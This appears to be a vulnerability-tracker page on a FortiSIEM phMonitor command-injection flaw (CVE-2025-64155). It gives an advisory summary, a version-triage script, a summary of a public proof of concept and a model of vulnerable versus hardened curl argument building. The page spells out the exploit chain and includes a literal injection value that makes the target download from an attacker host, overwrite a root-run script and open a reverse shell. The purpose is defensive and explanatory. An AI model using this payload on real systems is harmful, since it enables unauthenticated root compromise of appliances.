Unauthenticated OS Command Injection in Fortinet FortiSIEM phMonitor
CVE-2025-64155 is a critical OS command injection vulnerability in Fortinet FortiSIEM affecting 7.4.0, 7.3.0 through 7.3.4, 7.1.0 through 7.1.8, 7.0.0 through 7.0.4, and 6.7.0 through 6.7.10. The flaw sits in the phMonitor service, which listens on TCP port 7900, and stems from improper neutralization of special elements in input that ends up in OS commands. Available reporting indicates that phMonitor handlers can be reached remotely without authentication via crafted TCP requests, and that attacker-controlled input reaches shell-invoked logic in the storage configuration handling, including an argument-injection path into a curl invocation. Public technical analysis describes a two-stage exploit: first an arbitrary file write in the context of the admin user, then escalation to root by overwriting a script that is executed as root on a schedule, such as /opt/charting/redishb.sh, which yields full appliance compromise. Fortinet states the issue affects Super and Worker nodes; Collector nodes, FortiSIEM Cloud, and FortiSIEM 7.5 are reported as not affected. Because the handlers need no authentication, any network path to TCP 7900 on a Super or Worker node is attack surface; where patching is delayed, restricting that port to the FortiSIEM nodes that must reach it is the obvious interim control.
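The following is an added example, not code from this page or from Fortinet: it encodes the affected ranges quoted above as inclusive (first, last) pairs and compares versions as integer tuples, so that 6.7.10 sorts after 6.7.9 (a plain string comparison gets that wrong) and Collector nodes are excluded as the advisory text says. The function names and the sample inventory are assumptions of mine; Fortinet's advisory remains the authoritative source for the ranges.

```python
"""Triage a FortiSIEM inventory against the CVE-2025-64155 affected ranges.

Added example; the ranges are copied from the advisory summary on this page,
the helper names and sample hosts are invented for illustration.
"""

from typing import Iterable, List, Tuple

# (first affected, last affected), inclusive, as listed on the page.
AFFECTED_RANGES = [
    ("7.4.0", "7.4.0"),
    ("7.3.0", "7.3.4"),
    ("7.1.0", "7.1.8"),
    ("7.0.0", "7.0.4"),
    ("6.7.0", "6.7.10"),
]

# Per the page, only Super and Worker nodes carry the vulnerable exposure.
AFFECTED_ROLES = ("super", "worker")


def parse_version(v: str) -> Tuple[int, ...]:
    """'7.3.4' -> (7, 3, 4). Rejects anything that is not dotted integers so a
    malformed inventory field fails loudly instead of silently comparing as text."""
    parts = v.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {v!r}")
    return tuple(int(p) for p in parts)


def is_affected(version: str) -> bool:
    """True when version falls inside one of the published affected ranges.
    Tuple comparison makes 6.7.10 > 6.7.9, which string comparison would invert."""
    vt = parse_version(version)
    return any(parse_version(lo) <= vt <= parse_version(hi) for lo, hi in AFFECTED_RANGES)


def triage(inventory: Iterable[Tuple[str, str, str]]) -> List[Tuple[str, str, str]]:
    """inventory: (hostname, node role, version) triples.
    Returns the hosts that need patching: affected role AND affected version."""
    hits = []
    for host, role, ver in inventory:
        if role.lower() in AFFECTED_ROLES and is_affected(ver):
            hits.append((host, role, ver))
    return hits


if __name__ == "__main__":
    # Constructed sample inventory (hypothetical hosts, not real systems).
    sample = [
        ("siem-super-1", "Super", "7.3.4"),
        ("siem-worker-1", "Worker", "7.3.5"),
        ("siem-collector-1", "Collector", "7.3.4"),
        ("siem-super-2", "Super", "6.7.10"),
    ]
    for hit in triage(sample):
        print("needs patch:", hit)
```

The collector on an affected build is deliberately not flagged, matching the vendor statement; if your inventory does not record node role, treat unknown roles as Super/Worker rather than dropping them.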
Exploits
1 valid exploit after Mallory filtered fakes, detection scripts, and README-only repos (4 hidden).
Repository contains a working PoC for CVE-2025-64155 (Fortinet FortiSIEM) achieving argument injection → arbitrary file write → root RCE.

Structure:
- CVE-2025-64155.py: Main exploit. Opens a TLS socket to the FortiSIEM Phoenix Monitor service (default port 7900) and sends a crafted binary-framed message containing an XML <TEST_STORAGE type="elastic"> payload. The key exploit primitive is injection in <cluster_url>: appending extra arguments (e.g. "--next -o /opt/charting/redishb.sh http://10.0.40.83:9200") coerces the target's internal URL-testing script to fetch attacker content and write it to a chosen path.
- serve.py: Minimal HTTP server on port 9200 that responds only to GET /_cluster/health?pretty with a bash script (example reverse shell). This is the second-stage content the target is tricked into downloading.
- README.md: Usage notes and cautions. Describes editing the serve.py payload and cluster_url, running the web server, then running the exploit, and waiting about a minute for a cron job to execute the written script.

Capabilities:
- Remote network exploitation over TLS to a service endpoint.
- Forces the target to make an outbound HTTP request to attacker infrastructure.
- Writes a script to /opt/charting/redishb.sh and relies on scheduled execution for root code execution (example reverse shell to 10.0.40.83:4447).

Overall, this is an operational PoC with a hardcoded example payload and endpoints, intended for controlled testing rather than a generalized framework module.
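An added model of the primitive the PoC abuses, written for this page and not taken from FortiSIEM or the PoC repository: a cluster_url value is interpolated into a curl command line that is handed to a shell, so whitespace inside the value becomes extra curl arguments (`--next` opens a second transfer and `-o` sends its body to a path of the attacker's choosing). `shlex.split` stands in for the shell's word splitting, the command shape and function names are assumptions, and the address 10.0.40.83 is the illustrative host from the PoC summary above. The hardened variant validates the URL and builds argv as a list, so nothing is ever re-split; no curl process is started by this code.

```python
"""Vulnerable versus hardened construction of a curl command from a URL field.

Added example modelling the argument-injection class described on this page.
The real service's command shape is not known; this is an assumed stand-in.
"""

import shlex
from typing import List
from urllib.parse import urlsplit

# Path the storage test fetches; the PoC's serve.py answers exactly this request.
HEALTH_PATH = "/_cluster/health?pretty"


def build_curl_vulnerable(cluster_url: str) -> List[str]:
    """Vulnerable pattern: format a single shell string, then let the shell split it.
    shlex.split reproduces POSIX word splitting without executing anything, so the
    returned list is what /bin/sh would hand to curl as argv."""
    cmd = f"curl -s {cluster_url}{HEALTH_PATH}"
    return shlex.split(cmd)


def build_curl_hardened(cluster_url: str) -> List[str]:
    """Hardened pattern: validate the field as a URL and build argv directly.
    A list argv passed to subprocess.run(..., shell=False) is never re-split,
    so a value can only ever be one argument, never an option plus a path."""
    if any(ch.isspace() for ch in cluster_url):
        raise ValueError("whitespace in cluster_url")
    parts = urlsplit(cluster_url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise ValueError("cluster_url must be an absolute http(s) URL")
    return ["curl", "-s", cluster_url.rstrip("/") + HEALTH_PATH]


def option_tokens(argv: List[str]) -> List[str]:
    """Every argv element curl would parse as an option. The fixed command carries
    exactly one (-s); anything beyond that was smuggled in through the URL field."""
    return [a for a in argv[1:] if a.startswith("-")]


if __name__ == "__main__":
    # Constructed input mirroring the PoC's injection string (illustrative host).
    evil = "http://10.0.40.83:9200 --next -o /opt/charting/redishb.sh http://10.0.40.83:9200"
    print("vulnerable argv:", build_curl_vulnerable(evil))
    print("option tokens:  ", option_tokens(build_curl_vulnerable(evil)))
    try:
        build_curl_hardened(evil)
    except ValueError as exc:
        print("hardened rejected:", exc)
    print("hardened argv:  ", build_curl_hardened("http://10.0.40.83:9200"))
```

The vulnerable argv shows why the PoC's serve.py only needs to answer GET /_cluster/health?pretty: the second transfer fetches that path and `-o` writes the response body to /opt/charting/redishb.sh. Validation alone is not the fix; the essential change is that argv is assembled as a list and never passes through a shell.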
Recent activity
108 sources tracked across advisories, community write-ups, and news.
A critical command-injection vulnerability in FortiSIEM that was reported as being under widespread exploitation.
FortiSIEM OS command injection leading to unauthenticated RCE.
A critical vulnerability in Fortinet FortiSIEM that the article states has been exploited in the wild; no additional technical details are provided in the text.
An unauthenticated remote code execution vulnerability in Fortinet FortiSIEM's phMonitor service, attributed to improper neutralization of user-supplied input to an exposed API endpoint; described as leading to command injection, arbitrary file write, and RCE.